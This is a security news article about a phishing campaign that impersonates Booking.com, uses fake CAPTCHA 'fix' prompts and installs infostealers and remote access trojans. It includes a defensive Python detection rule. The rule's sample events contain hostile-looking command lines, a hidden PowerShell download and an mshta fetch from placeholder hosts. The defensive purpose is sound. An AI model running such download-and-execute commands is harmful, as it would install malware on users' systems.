The hospitality industry isn’t the only one facing a roster of challenges these days—cybercriminals are checking in too. A recent alert from Microsoft Threat Intelligence has uncovered a sophisticated phishing campaign impersonating Booking.com that targets hotels, resorts, and other businesses, aiming to pilfer payment details and sensitive personal data. Let’s break down how this campaign works, the malware it employs, and what Windows users can do to fortify their defenses.
An Insider Look at the Booking.com Impersonation Scam
At first glance, the phishing emails mimic legitimate Booking.com notifications. They discuss guest reviews and prompt account verifications to create the illusion of authenticity. The attackers have perfected the art of social engineering by exploiting the trust hotels and hospitality businesses place in well-known brands. But the real peril emerges once an unsuspecting user engages with the content.
- Initial Bait: The scam begins with a Booking.com-themed email that appears routine—a familiar invitation to review a recent stay or verify account details.
- Redirect to a Fake CAPTCHA: Upon clicking, the recipient is sent to a fake CAPTCHA page. While many might expect to simply validate their identity, these pages are designed to lull the victim into a false sense of security.
- Command Prompt Trap: If the victim successfully solves the CAPTCHA puzzle, they’re unexpectedly met with an error message. However, this isn't your ordinary error—it comes with a specific "solution", instructing the user to copy a command and paste it into the Windows Run dialog. Once executed, the command stealthily deploys malware onto the system.
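The flow above leaves a recognisable trace on the endpoint: whatever is pasted into the Run dialog is launched by explorer.exe. The following detection logic is an added example (not from the original article or from Microsoft's advisory) that scores process-creation events shaped like Sysmon Event ID 1 for that pattern; the field names, the list of script hosts, the command-line traits, and the sample events are all assumptions constructed for illustration.

```python
import re

# Processes a "paste this into Run" lure typically launches (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits that separate a lure from an admin opening a console.
RISKY_TRAITS = [
    (re.compile(r"https?://", re.I), "fetches content from a URL"),
    (re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "evaluates downloaded text"),
]

def _basename(path):
    """Lower-cased file name of a Windows path (the Sysmon Image/ParentImage field)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a finding dict for one process-creation event, or None.

    The Run dialog is hosted by explorer.exe, so a script host spawned by
    explorer.exe whose command line carries lure-like traits matches the
    ClickFix flow. A plain console opened from Run has no traits and is ignored.
    """
    if _basename(event["ParentImage"]) != "explorer.exe":
        return None
    child = _basename(event["Image"])
    if child not in SCRIPT_HOSTS:
        return None
    reasons = [why for rx, why in RISKY_TRAITS if rx.search(event["CommandLine"])]
    if not reasons:
        return None
    return {"user": event["User"], "process": child, "reasons": reasons}

def triage(events):
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in map(classify, events) if f]

# Constructed sample events in the shape of Sysmon Event ID 1 (not real telemetry).
SAMPLE_EVENTS = [
    {"User": "HOTEL\\frontdesk", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://example.invalid/fix"'},
    {"User": "HOTEL\\frontdesk", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
    {"User": "HOTEL\\itadmin", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # admin opening a console: benign
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Only the two lure-shaped launches are reported; the admin console and the service-spawned cmd.exe pass silently, which is the false-positive control such a rule needs before it is wired into an EDR alert.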
The Malware Arsenal Unleashed
Executing the command doesn’t remedy any “issues” on the computer. Instead, it triggers the download of one of several malware strains, each engineered to serve a unique malicious purpose:
- XWorm: While details on XWorm are still emerging, this variant is believed to function similarly to its malware kin, focusing on system compromise and data exfiltration.
- Lumma Stealer: As an infostealer, Lumma targets Windows devices to extract login credentials, browser-stored secrets, and further personal or business data. Imagine losing not just your keys but every spare copy hidden under your digital doormat.
- VenomRAT: Perhaps the most alarming of the trio, VenomRAT is a remote access trojan that grants attackers unfettered access to the infected device. This means that once the malware is in place, criminals could ransack sensitive directories and monitor system activities almost in real time.
Decoding the “ClickFix” Phishing Tactic
This isn’t the first time cybercriminals have employed the ClickFix method, but its evolution is noteworthy. Traditionally, similar scams took a direct approach: a pop-up, often impersonating an IT technician, would alert users to an urgent computer issue. In this new rendition:
- User-Driven Execution: Instead of a remote attack in which the user is compromised without taking part, the scam nudges the victim to perform a series of actions—solving a CAPTCHA and copy-pasting commands.
- Less Obvious Malware Installation: Rather than bluntly grabbing control, the process surreptitiously installs malicious software after the user ostensibly “fixes” an error. This adds an extra psychological layer of deception, as the user believes they are resolving a genuine system problem.
Meet the Threat Actor: Storm-1865
Microsoft attributes this alarming campaign to a threat actor designated Storm-1865—a group whose tactics seem to have emerged quite recently. While there isn’t an extensive track record for Storm-1865, their methodology speaks volumes about their intent and capability:
- Rapid Evolution: The campaign is described as “rapidly evolving,” a characteristic that suggests the attackers are continuously refining their techniques to avoid detection.
- Targeted Attacks: By focusing on the hospitality sector, Storm-1865 zeroes in on businesses with lucrative data, such as payment details and personal guest information.
- Global Reach with Local Impact: Though the origins might be obscure, the campaign’s global targeting amplifies the risk. A compromised hotel’s data could lead to international wire fraud and significant reputational damage.
Implications for Windows Users and IT Security
For individuals and businesses using Windows systems, this development is a stark reminder that cybersecurity vigilance isn’t optional—it’s essential. The phishing campaign not only reaffirms the need for robust network defenses but also highlights the importance of user education in preventing social engineering attacks.
Key Precautions to Consider:
- Verify Email Authenticity: Always double-check the sender’s email address. Even if the design mimics a known brand like Booking.com, slight discrepancies can be a major red flag.
- Avoid Running Unsolicited Commands: Never copy and paste commands from an email or web prompt unless you are entirely sure of their legitimacy. When in doubt, consult with IT.
- Implement Multi-Factor Authentication (MFA): By adding another layer of security beyond just passwords, MFA can help prevent unauthorized access even if credentials are stolen.
- Regular Windows Updates: Keep your operating system and security software up-to-date. Patches and updates often include critical fixes for known vulnerabilities that could be exploited by malware.
- User Education and Training: Continuous cybersecurity training can empower employees to recognize phishing attempts and take appropriate action.
Practical Steps for Teams:
- Conduct Internal Audits: Regularly review IT policies and systems to identify and mitigate potential vulnerabilities.
- Enable Real-Time Monitoring: Use endpoint detection and response (EDR) tools on Windows systems to spot unusual activities early.
- Establish Incident Response Protocols: Have clear guidelines in place for reporting and responding to suspected phishing attempts.
- Use Virtualized Environments: Running untrusted commands or suspicious attachments in sandboxed environments can limit damage if a breach occurs.
Broader Cybersecurity Trends and Final Thoughts
In our interconnected world, no industry is immune to cyber threats. The evolution of the ClickFix phishing technique underscores a broader trend: attackers are constantly innovating, learning from past mistakes, and adapting their strategies to exploit trust in established brands. For the hospitality industry and other sectors alike, this means balancing customer convenience with robust cybersecurity defenses has never been more critical.
Rhetorically, one might ask: How many familiar brands could be next on the criminals’ hit list? And is our reliance on trusted names leaving us more vulnerable than ever before? Such questions underline the pressing need for proactive measures in our cybersecurity posture.
For Windows users, the takeaway is clear—stay informed, remain skeptical of unsolicited requests, and keep to routine security practices, which remain everyone’s best line of defense against these evolving threats.
In conclusion, the new phishing campaign impersonating Booking.com is more than just another scam—it’s a sophisticated assault that integrates technical deception with social manipulation. As Storm-1865 tests the waters with this rapidly evolving tactic, both individuals and businesses are urged to bolster their cybersecurity defenses, remain vigilant in verifying the authenticity of unexpected communications, and adopt best practices that shield sensitive data from nefarious actors.
Stay secure, stay updated, and above all, trust—but verify.
Source: TechRadar, “Microsoft warns about a new phishing campaign impersonating Booking.com”